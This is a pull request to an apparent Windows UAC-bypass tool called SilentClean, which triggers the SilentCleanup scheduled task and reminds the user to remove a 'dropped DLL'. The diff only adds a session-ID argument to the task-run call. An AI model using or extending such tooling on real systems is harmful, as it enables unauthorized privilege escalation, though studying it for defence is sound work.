### PR TITLE
Optional commandline argument for SessionID

### DIFF
--- a/SilentClean/SilentClean/Program.cs
+++ b/SilentClean/SilentClean/Program.cs
@@ -15,7 +15,16 @@ namespace SilentClean
                 {
                     var task = tasksrvc.FindAllTasks(new Regex("SilentClean*"));
                     Console.WriteLine("\n[*] Starting Task");
-                    task[0].RunEx(TaskRunFlags.IgnoreConstraints | TaskRunFlags.UseSessionId, 1, "", "");
+                    int sessionId = 1;
+                    if (args.Length > 0)
+                    {
+                        bool success = int.TryParse(args[0], out sessionId);
+                        if (!success) //take 1 as default sessionID if the first cmdline argument isn't an integer. 
+                        {
+                            sessionId = 1; 
+                        }
+                    }
+                    task[0].RunEx(TaskRunFlags.IgnoreConstraints | TaskRunFlags.UseSessionId, sessionId, "", "");
                     Console.WriteLine("\n[*] Make sure to clean-after yourself and remove the dropped DLL");
                 }
             } catch (Exception e)


### PR DESCRIPTION
I've added an optional commandline argument for specifying the sessionID. Sometimes, the sesisonID doesn't have the default value of 1. In that case, this makes it easier to run SilentClean.